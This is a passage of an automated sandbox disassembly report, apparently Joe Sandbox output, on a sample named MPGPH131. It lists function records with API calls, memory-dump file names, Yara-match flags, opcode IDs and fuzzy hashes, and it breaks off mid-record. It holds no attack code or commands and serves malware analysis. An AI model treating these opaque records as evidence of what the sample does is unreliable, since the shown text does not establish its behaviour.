                                  • Opcode ID: f9b7cb1e82295501ef5d8dcf885e7fa1ca8161beaec2feb89a21e95a4daad543
                                  • Instruction ID: 59ef0b6240c4488ee893e934ea2466738870c649178104c431c883da00793057
                                  • Opcode Fuzzy Hash: f9b7cb1e82295501ef5d8dcf885e7fa1ca8161beaec2feb89a21e95a4daad543
                                  • Instruction Fuzzy Hash: BFF0893254522466DB216B66DC17BDB7BC9EF41B64BA580E5BC04A73D0CF30EC9186F1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 501 b16e2d-b16e39 502 b16e6b-b16e76 call b0d23f 501->502 503 b16e3b-b16e3d 501->503 510 b16e78-b16e7a 502->510 505 b16e56-b16e67 RtlAllocateHeap 503->505 506 b16e3f-b16e40 503->506 507 b16e42-b16e49 call b13f93 505->507 508 b16e69 505->508 506->505 507->502 513 b16e4b-b16e54 call b117d8 507->513 508->510 513->502 513->505
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,00B1D635,4D88C033,?,00B1D635,00000220,?,00B157EF,4D88C033), ref: 00B16E60
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 4d9f7d487e79edf1fe3382536426dbac8a6912d379ca25ba3ea72e477470d80d
                                  • Instruction ID: 067e740b4ba2643b2242dd052ced5e0f1b681c6bedee33a5a1eccb120da6747f
                                  • Opcode Fuzzy Hash: 4d9f7d487e79edf1fe3382536426dbac8a6912d379ca25ba3ea72e477470d80d
                                  • Instruction Fuzzy Hash: 2DE0ED3B14162166DE3022A5ED00BDBBBCCDF927A1FC507E1BC04920D0DF20CC8081E4
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(0000A483), ref: 0506090E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4153102222.0000000005060000.00000040.00001000.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_5060000_MPGPH131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: 87e6901fdf57aecb43f15c998be0325d52e0581338647e1f3d83216cab7fc97d
                                  • Instruction ID: 213e489657ad9c9713481e94bc83bf4a160dafb7e479a1e80732583767a63180
                                  • Opcode Fuzzy Hash: 87e6901fdf57aecb43f15c998be0325d52e0581338647e1f3d83216cab7fc97d
                                  • Instruction Fuzzy Hash: 13D0A7C32F45076CB6575F6517BC0BE3A47FA2B52933506B1A8468B106EB948A066BB0
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(0000A483), ref: 0506090E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4153102222.0000000005060000.00000040.00001000.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_5060000_MPGPH131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: de29493d07a198b57250018258ffcbe56263c2f580c7d607376ea71cf9c8f6a0
                                  • Instruction ID: ee18a1c8427322cbacfb1723e9717e9283d6e2834a184bef0cd82b944a4d76d7
                                  • Opcode Fuzzy Hash: de29493d07a198b57250018258ffcbe56263c2f580c7d607376ea71cf9c8f6a0
                                  • Instruction Fuzzy Hash: C4D022A22D88034FB6435338DF7A2EF278AFB22B10B100A70440AC7082EA74C4420062
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4153162404.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_5070000_MPGPH131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8e95dcc0c7601ae4e3ea5aeacc84b018e6080b692559db0027ff727de5a29a07
                                  • Instruction ID: 8c95b34cd279ad005fbd2b16ab35018803d47bc4578103a0af9b294432efe577
                                  • Opcode Fuzzy Hash: 8e95dcc0c7601ae4e3ea5aeacc84b018e6080b692559db0027ff727de5a29a07
                                  • Instruction Fuzzy Hash: 9321A1AB68C2197EA192D5952B2C9FE7BAEE5C3770730843AF502C6403E2C40A4E6570
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4153162404.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_5070000_MPGPH131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 55dbc2b9d8dad70400db5181b06771dadf41a2b2be74c685f0ac16f8f63a629d
                                  • Instruction ID: 2ce794c8887b8a74e739c4cfedb8bb20807a74d724c8c17d98863cea6b9dfd79
                                  • Opcode Fuzzy Hash: 55dbc2b9d8dad70400db5181b06771dadf41a2b2be74c685f0ac16f8f63a629d
                                  • Instruction Fuzzy Hash: 07119AAB68C1597D718291922B289FE7E6EE5C3730730853AF903D6403E2C40A5E6570
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4153162404.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_5070000_MPGPH131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7555075ba1cc060057c86679b5f74449dc5d35ec1d200f814287566d9f8f880
                                  • Instruction ID: b2c5aa13de8ac91f21280381659b4fa8bab7e23f3ea33ee155e99dcb8f102e7d
                                  • Opcode Fuzzy Hash: e7555075ba1cc060057c86679b5f74449dc5d35ec1d200f814287566d9f8f880
                                  • Instruction Fuzzy Hash: CC014CBF64C2487E6246E195332DAFE7F6AE6C73317304166F50395402E1D4065A9A70
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4153162404.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_5070000_MPGPH131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bd23369a7b990163385d15f32c70bfa9a3c297ba1dc47cfd192ffd95b48699d7
                                  • Instruction ID: 964e0cc6bac42af29e20fd7ad9513d3c07aced61065947c13cab31fd59818c09
                                  • Opcode Fuzzy Hash: bd23369a7b990163385d15f32c70bfa9a3c297ba1dc47cfd192ffd95b48699d7
                                  • Instruction Fuzzy Hash: 0A0145AF64C2187D7242E2912B2C9FEBFAEF5C3330730413AF50392503E2D409096A70
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4153162404.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_5070000_MPGPH131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35e50017cfa0cce0c2391c27415c9a81078126f6d6c3ffc78d3f1589c4eec7eb
                                  • Instruction ID: 8a01671db21b3ffca706c5bbe37372daf3de11a9be8e04d1688f435031c3ce66
                                  • Opcode Fuzzy Hash: 35e50017cfa0cce0c2391c27415c9a81078126f6d6c3ffc78d3f1589c4eec7eb
                                  • Instruction Fuzzy Hash: 2A0166BF64C2487EA246E2A5772D9FEBFAAE6C7330B304176F50396443E1D4065A9630
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4153162404.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_5070000_MPGPH131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd3c0d27172757ff1ab6cadf982b6d20828944ed742bc2bbe2444449556a9b14
                                  • Instruction ID: 26b56b32e6bcce55efbffd11459e72792cf01a1def43a63e63e1f410925d4597
                                  • Opcode Fuzzy Hash: dd3c0d27172757ff1ab6cadf982b6d20828944ed742bc2bbe2444449556a9b14
                                  • Instruction Fuzzy Hash: 1A0170BBA4D2587E678396D136688FD7F96E9C733073441A5F14249402D1D4055A9B31
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4df2230cf6d2b22dd9929c0dcf2eb738a93c5ed6b64abc4e5fced81a8044e2fc
                                  • Instruction ID: b36872ecee027f9b2e13e39631d5047c33f18f73355c9767f5dbf65828867afd
                                  • Opcode Fuzzy Hash: 4df2230cf6d2b22dd9929c0dcf2eb738a93c5ed6b64abc4e5fced81a8044e2fc
                                  • Instruction Fuzzy Hash: CD023C71E012199FDF14CFA9C8806AEBBF1FF48314F2582A9D559A7381DB31AA41CB90
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A8F833
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A8F855
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A8F875
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A8F89F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A8F90D
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A8F959
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00A8F973
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A8FA08
                                  • std::_Facet_Register.LIBCPMT ref: 00A8FA15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                  • String ID: bad locale name$Ps
                                  • API String ID: 3375549084-1174896957
                                  • Opcode ID: 85677738708a11aaa5536fc60d48c91c86dfe125da6f352c0110fd4ca171b247
                                  • Instruction ID: 5974b296e22c07219ceef40324bc785aea48628a4af3d3b1fddda3ce0cfdd4f8
                                  • Opcode Fuzzy Hash: 85677738708a11aaa5536fc60d48c91c86dfe125da6f352c0110fd4ca171b247
                                  • Instruction Fuzzy Hash: 54618F71E002099FEF11EFA4D945BAEBBF4AF14310F1440A8E805AB391EB74ED05CBA1
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A23A58
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A23AA4
                                  • __Getctype.LIBCPMT ref: 00A23ABA
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00A23AE6
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A23B7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                  • String ID: bad locale name
                                  • API String ID: 1840309910-1405518554
                                  • Opcode ID: 74e65b7e673854d32779c1f51adf772b879d26921c27c9682b210d0a3a5cd52a
                                  • Instruction ID: 479f40d9e70d441b03722aa1bd24390058f5274e4fdd8c59803a4aeff71e7b9a
                                  • Opcode Fuzzy Hash: 74e65b7e673854d32779c1f51adf772b879d26921c27c9682b210d0a3a5cd52a
                                  • Instruction Fuzzy Hash: 755141B2D012589FDF10DFE8D945B9EBBF8AF15310F144069E909AB381E779DA04CB91
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00B02E47
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00B02E4F
                                  • _ValidateLocalCookies.LIBCMT ref: 00B02ED8
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00B02F03
                                  • _ValidateLocalCookies.LIBCMT ref: 00B02F58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: de9b0beaf0c31a1849f1b1de3cbfb95ff9c819868aea62588a721d15b04d0c63
                                  • Instruction ID: 044add508d373b559c9799e984781c5974994fb66bd76a9c56fde9910f1886db
                                  • Opcode Fuzzy Hash: de9b0beaf0c31a1849f1b1de3cbfb95ff9c819868aea62588a721d15b04d0c63
                                  • Instruction Fuzzy Hash: C8418234A002099BCF10DF68C889A9EBFF5EF45354F1481E5E9189B3D2D731AE59CB91
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A8DE93
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A8DEB6
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A8DED6
                                  • std::_Facet_Register.LIBCPMT ref: 00A8DF4B
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A8DF63
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00A8DF7B
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 7815a26a62ced9cc1d764f18a0e433352cc5e78e41fa278eb2a25910f52ba060
                                  • Instruction ID: aa84ed0369359858202eb05785f489729111ed1578c4f501208826498a4b7252
                                  • Opcode Fuzzy Hash: 7815a26a62ced9cc1d764f18a0e433352cc5e78e41fa278eb2a25910f52ba060
                                  • Instruction Fuzzy Hash: 0641E2719002199FCB15EF98E941BAEBBB4FF05720F144269F9169B392DB31AD00CBD1
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00A24F72
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00A24FFF
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A250C8
                                  Strings
                                  • recursive_directory_iterator::operator++, xrefs: 00A2504C
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy$___std_exception_copy
                                  • String ID: recursive_directory_iterator::operator++
                                  • API String ID: 1206660477-953255998
                                  • Opcode ID: 433eaa9924e5ea96df7bad2a806208e7f28bc10f3e5cac5d86dbf5318dc499ef
                                  • Instruction ID: 7bc7670565e4c664d09267f64286b274b2fed6e87ee07c9e9e45033acb4c1696
                                  • Opcode Fuzzy Hash: 433eaa9924e5ea96df7bad2a806208e7f28bc10f3e5cac5d86dbf5318dc499ef
                                  • Instruction Fuzzy Hash: 0BE126719002149FDB28DF68E945BAEFBF9FF48700F108A2DE45697781E774A904CBA1
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A2799A
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A27B75
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: out_of_range$type_error
                                  • API String ID: 2659868963-3702451861
                                  • Opcode ID: c6a4f167d4544579af9cf17a68f4c11f5f18efadc715fd545f60574130c1bf44
                                  • Instruction ID: 8249b16e414a9b00cabd117bfc2b77ec49489fa8438d1a8c0db7d0fb0361b50f
                                  • Opcode Fuzzy Hash: c6a4f167d4544579af9cf17a68f4c11f5f18efadc715fd545f60574130c1bf44
                                  • Instruction Fuzzy Hash: 8FC168B19002189FDB18CFACE984B9DBBF1FF49310F148669E419EB791E7749A80CB51
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00A275BE
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00A275CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145805846.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145971849.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4145995268.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147443008.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000005.00000002.4147804395.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: at line $, column
                                  • API String ID: 4194217158-191570568
                                  • Opcode ID: e443bb6603405c4ef2fcb47cd30f78f8495b6f4a7d9d35eb2c713d27f2c67488
                                  • Instruction ID: 3facbc8b6b9659cc5a3b40a7dc53187ee8bec303fe0b93fd58db1306d8d68f0d
                                  • Opcode Fuzzy Hash: e443bb6603405c4ef2fcb47cd30f78f8495b6f4a7d9d35eb2c713d27f2c67488
                                  • Instruction Fuzzy Hash: 0561D171A042199FDB08DF68ED85BADBBB6FF49300F244668E415A7B81D774AA408B90
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A23E7F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000005.00000002.4145770328.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
